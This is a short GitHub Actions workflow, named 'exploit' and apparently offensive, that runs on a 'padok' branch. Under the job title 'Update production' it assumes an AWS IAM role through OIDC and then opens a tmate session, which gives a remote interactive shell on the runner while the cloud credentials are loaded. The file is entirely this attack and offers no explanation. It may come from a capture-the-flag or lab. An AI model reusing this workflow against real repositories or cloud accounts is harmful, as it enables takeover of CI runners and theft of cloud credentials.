name: exploit
on:
  push:
    branches:
      - padok

permissions:
  id-token: write # This is required for requesting the JWT
  contents: read  # This is required for actions/checkout

env:
  AWS_REGION: "us-east-1"
  CLOUDFRONT_DISTRIBUTION: EANLA81IN8LFF
jobs:
  build-docker-image:
    name: Update production
    runs-on: ubuntu-latest
    permissions:
      id-token: write # This is required for requesting the JWT
      contents: read  # This is required for actions/checkout
    steps:
      - name: Check out the repo
        uses: actions/checkout@v2

      - name: configure aws credentials
        uses: aws-actions/configure-aws-credentials@v2
        with:
          role-to-assume: arn:aws:iam::520091917895:role/magichk_role
          role-session-name: padok
          aws-region: ${{ env.AWS_REGION }}

      - name: Setup tmate session
        uses: mxschmitt/action-tmate@v3
